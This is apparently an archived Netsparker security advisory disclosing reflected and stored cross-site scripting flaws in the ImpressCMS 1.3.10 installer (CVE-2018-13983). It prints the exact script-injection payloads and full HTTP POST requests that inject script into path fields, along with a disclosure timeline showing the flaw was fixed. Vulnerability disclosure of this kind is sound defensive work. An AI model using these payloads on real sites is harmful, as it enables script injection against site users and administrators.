exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ImpressCMS 1.3.10 Cross Site Scripting

ImpressCMS 1.3.10 Cross Site Scripting
Posted Jan 2, 2019
Authored by Omar Kurt | Site netsparker.com

ImpressCMS version 1.3.10 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2018-13983
SHA-256 | c84a7f7926087829c85a807a542aa2d144ba6ce6becb4914b1c4f4a276f15e66

ImpressCMS 1.3.10 Cross Site Scripting

Change Mirror Download

Multiple Cross-site Scripting Vulnerabilities in ImpressCMS 1.3.10

Information
--------------------

Advisory by Netsparker
Name: Reflected and Stored XSS Vulnerabilities in ImpressCMS
Affected Software: ImpressCMS
Affected Versions: 1.3.10
Homepage: https://www.impresscms.org/
Vulnerability: Reflected and Stored XSS Vulnerabilities
Severity: High
Status: Fixed
CVE-ID: CVE-2018-13983
Netsparker Advisory Reference: NS-18-033

Technical Details
--------------------

Cross-site Scripting

URL http://app.scan/ScanApp/impresscms/htdocs/install/index.php/'"--></style></scRipt><scRipt>netsparker(0x00012C)</scRipt>
Proof URL http://app.scan/ScanApp/impresscms/htdocs/install/index.php/'"--></style></scRipt><scRipt>alert(0x00012C)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>netsparker(0x00012C)</scRipt>

URL http://app.scan/ScanApp/impresscms/htdocs/install/page_langselect.php/'"--></style></scRipt><scRipt>netsparker(0x0006F2)</scRipt>
Proof URL http://app.scan/ScanApp/impresscms/htdocs/install/page_langselect.php/'"--></style></scRipt><scRipt>alert(0x0006F2)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>netsparker(0x0006F2)</scRipt>

URL http://app.scan/ScanApp/impresscms/htdocs/install/page_modcheck.php/'"--></style></scRipt><scRipt>netsparker(0x000881)</scRipt>
Proof URL http://app.scan/ScanApp/impresscms/htdocs/install/page_modcheck.php/'"--></style></scRipt><scRipt>alert(0x000881)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>netsparker(0x000881)</scRipt>

URL http://app.scan/ScanApp/impresscms/htdocs/install/page_pathsettings.php/'"--></style></scRipt><scRipt>netsparker(0x000919)</scRipt>
Proof URL http://app.scan/ScanApp/impresscms/htdocs/install/page_pathsettings.php/'"--></style></scRipt><scRipt>alert(0x000919)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>netsparker(0x000919)</scRipt>

URL http://app.scan/ScanApp/impresscms/htdocs/install/page_start.php/'"--></style></scRipt><scRipt>netsparker(0x0006F0)</scRipt>
Proof URL http://app.scan/ScanApp/impresscms/htdocs/install/page_start.php/'"--></style></scRipt><scRipt>alert(0x0006F0)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>netsparker(0x0006F0)</scRipt>

-------

Stored Cross-Site Scripting

URL http://app.scan/ScanApp/impresscms/htdocs/install/page_pathsettings.php
Injection URL http://app.scan/ScanApp/impresscms/htdocs/install/page_pathsettings.php

Vulnerable TRUST_PATH :

#Injection
POST /ScanApp/impresscms/htdocs/install/page_pathsettings.php HTTP/1.1
Host: app.scan
Cache-Control: no-cache
Referer: http://app.scan/ScanApp/impresscms/htdocs/install/page_pathsettings.php
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Cookie: xo_install_lang=english; PHPSESSID=hnt9hof7s46l5tn1r958moao37
Accept-Encoding: gzip, deflate
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
URL=http%3a%2f%2fapp.scan%2fScanApp%2fimpresscms%2fhtdocs&ROOT_PATH=%2fvar%2fwww%2fhtml%2fScanApp%2fimpresscms%2fhtdocs&TRUST_PATH='"--></style></scRipt><scRipt>netsparker(0x000F44)</scRipt>
#End

Vulnerable ROOT_PATH :

#Injection
POST /ScanApp/impresscms/htdocs/install/page_pathsettings.php HTTP/1.1
Host: app.scan
Cache-Control: no-cache
Referer: http://app.scan/ScanApp/impresscms/htdocs/install/page_pathsettings.php
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Cookie: xo_install_lang=english; PHPSESSID=hnt9hof7s46l5tn1r958moao37
Accept-Encoding: gzip, deflate
Content-Length: 186
Content-Type: application/x-www-form-urlencoded
URL=http%3a%2f%2fapp.scan%2fScanApp%2fimpresscms%2fhtdocs&ROOT_PATH='"--></style></scRipt><scRipt>netsparker(0x000F41)</scRipt>&TRUST_PATH=%2fvar%2fwww%2f623962b73562c7f
#End

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------

8th November 2018- First Contact
3rd December 2018 - Vendor Fixed
2nd January 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.


Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close